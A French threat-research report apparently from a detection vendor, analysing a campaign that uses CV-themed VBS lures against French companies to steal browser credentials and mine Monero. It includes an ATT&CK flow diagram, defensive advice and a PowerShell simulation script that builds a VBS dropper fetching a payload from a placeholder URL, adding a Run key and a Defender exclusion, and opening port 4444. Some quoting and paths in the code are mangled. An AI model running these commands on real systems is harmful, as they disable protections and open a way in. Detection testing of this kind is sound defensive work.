Analyse de FAUX#ELEVATE : des acteurs de la menace ciblent la France avec des appâts CV pour déployer des mineurs de cryptomonnaies et des voleurs d’informations ciblant les environnements d’entreprise

Ruslan Mikhalov Chef de la Recherche sur les Menaces chez SOC Prime

Suivre

Analyse de FAUX#ELEVATE : des acteurs de la menace ciblent la France avec des appâts CV pour déployer des mineurs de cryptomonnaies et des voleurs d’informations ciblant les environnements d’entreprise

Detection stack

AIDR
Alert
ETL
Query

Rapport
Flux d'Attaque
Détections
Simulations

Résumé

Une opération de cybercriminalité exploite un fichier VBS de CV malveillant pour cibler les environnements d’entreprises francophones. Le dropper est fortement obscurci et est conçu pour s’exécuter uniquement sur des machines jointes à un domaine, où il livre un malware voleur de crédentials ainsi qu’un mineur Monero. La campagne utilise des services de confiance tels que Dropbox et des sites WordPress marocains compromis pour héberger des charges utiles. Les données volées sont exfiltrées via SMTP vers mail.ru, et le malware efface ses traces après exécution pour réduire la visibilité lors d’une enquête judiciaire.

Enquête

Les chercheurs ont rétro-ingénié le dropper VBS, découvert ses vérifications environnementales, et cartographié la chaîne d’infection multi-étapes complète, y compris l’extraction 7-Zip, un RAT personnalisé nommé RuntimeHost.exe, le vol de crédentials du navigateur ChromElevator et l’activité de minage XMRig. Ils ont également identifié l’infrastructure de soutien comme des adresses IP, des entrées DNS dynamiques et des serveurs WordPress piratés. La persistance était liée aux clés Run du registre et à une tâche planifiée dissimulée.

Atténuation

Les défenseurs devraient bloquer les fichiers VBS suspects et appliquer des contrôles stricts sur les pièces jointes d’email. La surveillance doit se concentrer sur l’exécution anormale de wscript.exe, les commandes PowerShell qui ajoutent des exclusions de Defender, et les changements de registre affectant EnableLUA. Les organisations devraient restreindre le SMTP sortant des applications non-email et surveiller les connexions aux infrastructures connues de Dropbox et de pools de minage. Toute clé de registre identifiée ou tâche planifiée doit être supprimée ou mise en quarantaine.

Réponse

Les équipes de sécurité devraient détecter la création des clés Run “Microsoft Media Service” et “z_MicrosoftEdgeAutoLaunch_2EDFBF”, ainsi que de la tâche planifiée cachée “MicrosoftUpdateService”. Des alertes devraient déclencher pour les processus wscript.exe qui contactent Dropbox ou les domaines WordPress documentés. Les fichiers malveillants doivent être mis en quarantaine, l’hôte isolé, et les crédentials du navigateur exposés réinitialisés. Une revue judiciaire devrait ensuite déterminer si des données volées ont été exfiltrées via mail.ru.

"graph TB %% Définitions des classes classDef action fill:#99ccff classDef tool fill:#ffcc99 classDef process fill:#ffddaa classDef technique fill:#c0c0c0 %% Définitions des nœuds step_phishing["Technique – T1566.001 Phishing : Pièce jointe d’hameçonnage ciblé Description : Email avec pièce jointe malveillante qui, lorsqu’elle est ouverte, livre la charge utile initiale."] class step_phishing action step_user_execute["Technique – T1204.002 Exécution utilisateur : Fichier malveillant Description : La victime exécute le fichier VBS joint, déclenchant le dropper."] class step_user_execute action step_dropper["Technique – T1059.005 Visual Basic (VBScript) Technique – T1027 Fichiers ou informations obscurcis Description : Script VBS obscurci qui agit en tant que dropper extrayant des composants additionnels."] class step_dropper action step_domain_check["Technique – T1069.002 Découverte de groupe de permissions : Domaine Description : Vérifie si l’hôte est joint à un domaine pour adapter le comportement."] class step_domain_check technique step_uac_bypass["Technique – T1548.002 Contournement du contrôle de compte utilisateur Technique – T1562.001 Affaiblir les défenses : Désactiver les outils de sécurité Technique – T1564.012 Cacher les artefacts : Exclusions de Defender Description : Élévation des privilèges, désactivation des défenses et ajout d’exclusions."] class step_uac_bypass technique step_download["Technique – T1102 Service Web Technique – T1102.001 Dead Drop Resolver Description : Récupère des charges utiles supplémentaires depuis Dropbox ou des emplacements web."] class step_download technique step_deploy_toolkit["Outil – RuntimeHost.exe, XMRig Miner, Stealers de navigateur Description : Déploie des composants pour le minage, le vol de crédentials et d’autres exploitations."] class step_deploy_toolkit tool step_cred_access["Technique – T1555.003 Crédentials depuis les navigateurs web Description : Extrait les mots de passe et cookies stockés du navigateur."] class step_cred_access technique step_collect_files["Technique – T1005 Données du système local Description : Rassemble des fichiers du bureau de l’utilisateur pour l’exfiltration."] class step_collect_files technique step_exfiltration["Technique – T1048.002 Exfiltration via un protocole non-C2 crypté : SMTP Technique – T1071.003 Protocoles Web : Protocoles de messagerie Description : Envoie des données collectées via SMTP chiffré."] class step_exfiltration technique step_resource_hijack["Technique – T1496 Détournement de ressources Description : Utilise XMRig pour miner des cryptomonnaies sur l’hôte victime."] class step_resource_hijack technique step_process_injection["Technique – T1055 Injection de processus Description : Injecte un code malveillant dans explorer.exe pour cacher l’activité."] class step_process_injection technique step_c2["Technique – T1102 Service Web (HTTPS/DNS dynamique) Description : Maintient le command-and-control sur le trafic web chiffré et les ports personnalisés."] class step_c2 technique step_persistence["Technique – T1547.001 Clés Run du registre / Dossier de démarrage Technique – T1053 Tâche/Emploi Planifié (Caché) Description : Établit une persistance via une clé Run et une tâche planifiée cachée."] class step_persistence technique step_cleanup["Technique – T1070.004 Suppression de fichiers Description : Supprime les artefacts et les journaux pour échapper à la détection."] class step_cleanup technique %% Connexions des bords step_phishing –>|leads_to| step_user_execute step_user_execute –>|leads_to| step_dropper step_dropper –>|leads_to| step_domain_check step_domain_check –>|leads_to| step_uac_bypass step_uac_bypass –>|leads_to| step_download step_download –>|leads_to| step_deploy_toolkit step_deploy_toolkit –>|enables| step_cred_access step_deploy_toolkit –>|enables| step_collect_files step_cred_access –>|combined_with| step_collect_files step_cred_access –>|supports| step_exfiltration step_collect_files –>|supports| step_exfiltration step_deploy_toolkit –>|enables| step_resource_hijack step_deploy_toolkit –>|enables| step_process_injection step_process_injection –>|provides| step_c2 step_c2 –>|used_by| step_exfiltration step_deploy_toolkit –>|establishes| step_persistence step_persistence –>|followed_by| step_cleanup step_exfiltration –>|followed_by| step_cleanup "

Flux d’attaque

Narratif & Commandes de l’attaque :
1. Étape 1 – Déposer un VBS malveillant : L’attaquant écrit un dropper VBS qui télécharge une charge utile de deuxième étape et écrit une clé de registre de démarrage pour la persistance.
2. Étape 2 – Exécuter VBS via wscript.exe avec PowerShell comme processus parent, satisfaisant ainsi la condition parent-enfant de la détection.
3. Étape 3 – Dans le VBS, invoquer PowerShell pour ajouter une exclusion Microsoft Defender (T1562.001) et Netsh pour ouvrir le port TCP entrant 4444 (T1562.004) pour C2.
4. Étape 4 – Nettoyer les preuves après succès.

Script de test de régression : (PowerShell – autonome ; exécuter avec des droits administratifs)

# -----------------------------------------------------------------------
# Simulation de démarreur VBS malveillant – déclenche la règle Sigma :
#   Image == "*wscript.exe" ET ParentImage dans («*powershell.exe», "*netsh.exe")
# -----------------------------------------------------------------------

$vbsPath = "$env:Tempmalicious_dropper.vbs"
$payloadUrl = "http://example.com/payload.exe"   # URL de remplacement
$payloadPath = "$env:Temppayload.exe"

# 1. Créer un VBS malveillant qui :
#    • Télécharge une charge utile
#    • Écrit une clé de démarrage pour la persistance
#    • Appelle PowerShell pour ajouter une exclusion Defender
#    • Appelle Netsh pour ouvrir une règle de pare-feu
$vbsContent = @"
Set objXML = CreateObject("Microsoft.XMLHTTP")
objXML.Open "GET", "$payloadUrl", False
objXML.Send
If objXML.Status = 200 Then
Set objStream = CreateObject("ADODB.Stream")
objStream.Type = 1
objStream.Open
objStream.Write objXML.ResponseBody
objStream.SaveToFile "$payloadPath", 2
End If

‘ Persistance via clé de démarrage Set objShell = CreateObject(« WScript.Shell ») objShell.RegWrite « HKCUSoftwareMicrosoftWindowsCurrentVersionRunmalicious », « $payloadPath »

‘ Exclusion de Defender via PowerShell (exécuté en ligne) objShell.Run « powershell.exe -NoProfile -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath '$payloadPath'« », 0, True

‘ Ouvrir le port de pare-feu 4444 via Netsh (exécuté en ligne) objShell.Run « netsh.exe advfirewall firewall add rule name="MaliciousPort » dir=in action=allow protocol=TCP localport=4444″, 0, True « @

Set-Content -Path $vbsPath -Value $vbsContent -Encoding ASCII

# 2. Lancer le VBS avec PowerShell comme processus parent
Write-Host "[*] Lancement du VBS malveillant via wscript.exe (parent: PowerShell)"
Start-Process -FilePath "powershell.exe" -ArgumentList "-NoProfile -WindowStyle Hidden -Command `"wscript.exe `"$vbsPath`"`"" -Wait

# 3. Vérifier que la règle de pare-feu a été ajoutée (facultatif)
netsh advfirewall firewall show rule name=MaliciousPort

# 4. Nettoyer les artefacts (charge utile & VBS) – laissé pour une section de nettoyage séparée
Write-Host "[+] Simulation terminée. Vérifiez les alertes dans le SIEM."

Commandes de nettoyage : (exécuter après vérification)

# Supprimer la règle de pare-feu
netsh advfirewall firewall delete rule name="MaliciousPort"

# Supprimer l'exclusion Defender
powershell.exe -Command "Remove-MpPreference -ExclusionPath '$env:Temppayload.exe'"

# Supprimer la clé de persistance Run
reg delete "HKCUSoftwareMicrosoftWindowsCurrentVersionRunmalicious" /f

# Supprimer les fichiers
Remove-Item -Path "$env:Tempmalicious_dropper.vbs" -Force
Remove-Item -Path "$env:Temppayload.exe" -Force

Write-Host "[+] Nettoyage terminé."

Rejoignez la plateforme Detection as Code de SOC Prime pour améliorer la visibilité sur les menaces les plus pertinentes pour votre entreprise. Pour vous aider à démarrer et à générer une valeur immédiate, planifiez dès maintenant une réunion avec des experts de SOC Prime.

Rejoindre gratuitement